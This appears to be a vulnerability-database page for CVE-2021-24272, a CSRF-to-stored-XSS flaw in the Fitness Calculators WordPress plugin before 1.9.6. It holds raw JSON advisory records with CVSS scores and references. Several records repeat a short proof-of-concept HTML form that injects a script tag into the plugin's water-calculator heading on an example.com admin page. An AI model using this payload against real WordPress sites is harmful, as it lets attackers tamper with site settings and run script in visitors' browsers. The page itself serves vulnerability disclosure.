Description
The Fitness Calculators WordPress plugin before 1.9.6 adds calculators for water intake, BMI, protein intake, and body fat, and lacked a CSRF check, allowing attackers to make logged-in users perform unwanted actions, such as changing the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue.
Affected Software
Related
{"id": "CVE-2021-24272", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24272", "description": "The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue", "published": "2021-05-05T19:15:00", "modified": "2021-12-03T19:59:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24272", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "http://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html"], "cvelist": ["CVE-2021-24272"], "immutableFields": [], "lastseen": "2022-03-23T14:50:43", "viewCount": 59, "enchantments": {"dependencies": 
{"references": [{"type": "exploitdb", "idList": ["EDB-ID:50325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164261"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "zdt", "idList": ["1337DAY-ID-36795"]}], "rev": 4}, "score": {"value": 3.4, "vector": "NONE"}, "twitter": {"counter": 3, "modified": "2021-09-24T07:26:54", "tweets": [{"link": "https://twitter.com/RemotelyAlerts/status/1466876747387858946", "text": "Severity: | The fitness calculators WordPress plugin... | CVE-2021-24272 | Link for more: https://t.co/dLM2CGYL3f"}, {"link": "https://twitter.com/hernanespinoza/status/1390323907580862466", "text": "CVEnew: CVE-2021-24272 The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, s\u2026 https://t.co/Hu2MGDDnHF?amp=1"}, {"link": "https://twitter.com/hernanespinoza/status/1390323907580862466", "text": "CVEnew: CVE-2021-24272 The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, s\u2026 https://t.co/Hu2MGDDnHF?amp=1"}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164261"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "zdt", "idList": ["1337DAY-ID-36795"]}]}, "exploitation": null, "vulnersScore": 3.4}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-352"], "affectedSoftware": [{"cpeName": 
"codeinitiator:fitness_calculators", "version": "1.9.6", "operator": "lt", "name": "codeinitiator fitness calculators"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:codeinitiator:fitness_calculators:1.9.6:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.9.6", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "name": "https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html", "name": "http://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"zdt": [{"lastseen": "2021-12-04T15:50:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "zdt", "title": "WordPress Fitness Calculators 1.9.5 Plugin - Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-09-23T00:00:00", "id": "1337DAY-ID-36795", "href": "https://0day.today/exploit/description/36795", "sourceData": "# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)\n# Author: 0xB9\n# Software Link: https://wordpress.org/plugins/fitness-calculators/\n# Version: 1.9.5\n# Tested on: Windows 10\n# CVE: CVE-2021-24272\n\n1. Description:\nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n\n2. 
Proof of Concept:\n\n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\n <input type=\"submit\" value=\"Save\" name=\"submit\">\n</form>\n", "sourceHref": "https://0day.today/exploit/36795", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:39", "description": "Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerability discovered by 0xB9 in WordPress fitness calculators plugin (versions <= 1.9.5).\n\n## Solution\n\n\r\n Update the WordPress fitness calculators plugin to the latest available version (at least 1.9.6).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-04-14T00:00:00", "type": "patchstack", "title": "WordPress fitness calculators plugin <= 1.9.5 - Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-14T00:00:00", "id": 
"PATCHSTACK:D86DD962E94B5A6A242FCC273B53A5A4", "href": "https://patchstack.com/database/vulnerability/fitness-calculators/wordpress-fitness-calculators-plugin-1-9-5-cross-site-request-forgery-csrf-leading-to-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-05-12T03:38:42", "description": "The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {}, "published": "2021-04-14T00:00:00", "type": "wpvulndb", "title": "Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-16T07:02:57", "id": "WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F", "href": "https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-09-23T15:45:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "packetstorm", "title": "WordPress Fitness Calculators 1.9.5 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-09-23T00:00:00", "id": "PACKETSTORM:164261", "href": "https://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) \n# Date: 2/28/2021 \n# Author: 0xB9 \n# Software Link: https://wordpress.org/plugins/fitness-calculators/ \n# Version: 1.9.5 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24272 \n \n1. Description: \nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue \n \n2. Proof of Concept: \n \n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\"> \n<input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\"> \n<input type=\"submit\" value=\"Save\" name=\"submit\"> \n</form> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164261/wpfitnesscalaculators195-xsrf.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-05-12T03:38:42", "description": "The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. 
Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n", "cvss3": {}, "published": "2021-04-14T00:00:00", "type": "wpexploit", "title": "Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-16T07:02:57", "id": "WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F", "href": "", "sourceData": "<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\r\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\r\n <input type=\"submit\" value=\"Save\" name=\"submit\">\r\n</form>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-05-13T17:35:26", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24272", "CVE-2021-24272"], 
"modified": "2021-09-23T00:00:00", "id": "EDB-ID:50325", "href": "https://www.exploit-db.com/exploits/50325", "sourceData": "# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)\r\n# Date: 2/28/2021\r\n# Author: 0xB9\r\n# Software Link: https://wordpress.org/plugins/fitness-calculators/\r\n# Version: 1.9.5\r\n# Tested on: Windows 10\r\n# CVE: CVE-2021-24272\r\n\r\n1. Description:\r\nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \r\nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\r\n\r\n2. Proof of Concept:\r\n\r\n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\r\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\r\n <input type=\"submit\" value=\"Save\" name=\"submit\">\r\n</form>", "sourceHref": "https://www.exploit-db.com/download/50325", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}